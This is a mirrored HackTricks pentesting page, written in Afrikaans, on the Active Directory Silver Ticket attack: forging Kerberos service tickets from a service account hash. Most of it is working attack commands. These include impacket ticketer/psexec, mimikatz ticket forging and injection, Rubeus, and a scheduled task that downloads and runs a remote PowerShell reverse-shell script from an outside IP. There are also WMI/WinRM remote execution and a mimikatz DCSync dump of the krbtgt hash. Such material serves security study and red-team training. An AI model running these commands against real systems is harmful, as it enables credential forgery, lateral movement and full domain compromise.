Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/silver-ticket.md

8.7 KiB
Raw Blame History

Silwermatriek

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Bug bounty wenk: teken aan vir Intigriti, 'n premium bug bounty platform geskep deur hackers, vir hackers! Sluit by ons aan by https://go.intigriti.com/hacktricks vandag, en begin om belonings te verdien tot $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Silwermatriek

Die Silwermatriek-aanval behels die uitbuiting van dienskaartjies in Aktiewe Gids (AD) omgewings. Hierdie metode steun op die verkryging van die NTLM-hash van 'n diensrekening, soos 'n rekenaarrekening, om 'n Kaartjieverleningsdiens (TGS) kaartjie te vervals. Met hierdie vervalste kaartjie kan 'n aanvaller toegang verkry tot spesifieke dienste op die netwerk, deur enige gebruiker te simuleer, gewoonlik met die doel om administratiewe voorregte te verkry. Daar word beklemtoon dat die gebruik van AES-sleutels vir die vervalsing van kaartjies meer veilig en minder opspoorbaar is.

Vir kaartjie-vervaardiging word verskillende gereedskap gebruik gebaseer op die bedryfstelsel:

Op Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Op Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Die CIFS-diens word uitgelig as 'n algemene teiken om toegang tot die slagoffer se lêersisteem te verkry, maar ander dienste soos HOST en RPCSS kan ook uitgebuit word vir take en WMI-navrae.

Beskikbare Dienste

Diens Tipe Diens Silwer Kaartjies
WMI

HOST

RPCSS
PowerShell Remoting

HOST

HTTP

Afhanklik van OS ook:

WSMAN

RPCSS
WinRM

HOST

HTTP

In sommige gevalle kan jy net vra vir: WINRM
Geskeduleerde Take HOST
Windows Lêerdeling, ook psexec CIFS
LDAP-operasies, ingesluit DCSync LDAP
Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS
Goue Kaartjies krbtgt

Met Rubeus kan jy vir almal hierdie kaartjies vra deur die parameter te gebruik:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silwer kaartjie Gebeurtenis ID's

  • 4624: Rekening Aanmelding
  • 4634: Rekening Afgemeld
  • 4672: Admin Aanmelding

Misbruik van Dienskaartjies

In die volgende voorbeelde, laat ons aanneem dat die kaartjie verkry is deur die administrateurrekening te impersoneer.

CIFS

Met hierdie kaartjie sal jy toegang hê tot die C$ en ADMIN$-vouer via SMB (indien blootgestel) en lêers na 'n deel van die afgeleë lêersisteem kopieer deur iets soos:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

GASHEER

Met hierdie toestemming kan jy geskeduleerde take op afgeleë rekenaars genereer en willekeurige bevele uitvoer:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

GAS + RPCSS

Met hierdie kaartjies kan jy WMI uitvoer in die slagoffer se stelsel:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Vind meer inligting oor wmiexec op die volgende bladsy:

{% content-ref url="../lateral-movement/wmicexec.md" %} wmicexec.md {% endcontent-ref %}

GAS + WSMAN (WINRM)

Met winrm-toegang oor 'n rekenaar kan jy daarop toegang kry en selfs 'n PowerShell kry:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

LDAP

Met hierdie voorreg kan jy die DC-databasis dump met behulp van DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Leer meer oor DCSync op die volgende bladsy:

Verwysings

{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}

Bug bounty wenk: teken aan vir Intigriti, 'n premium bug bounty platform geskep deur hackers, vir hackers! Sluit by ons aan by https://go.intigriti.com/hacktricks vandag, en begin om belonings te verdien tot $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Leer AWS hak vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun: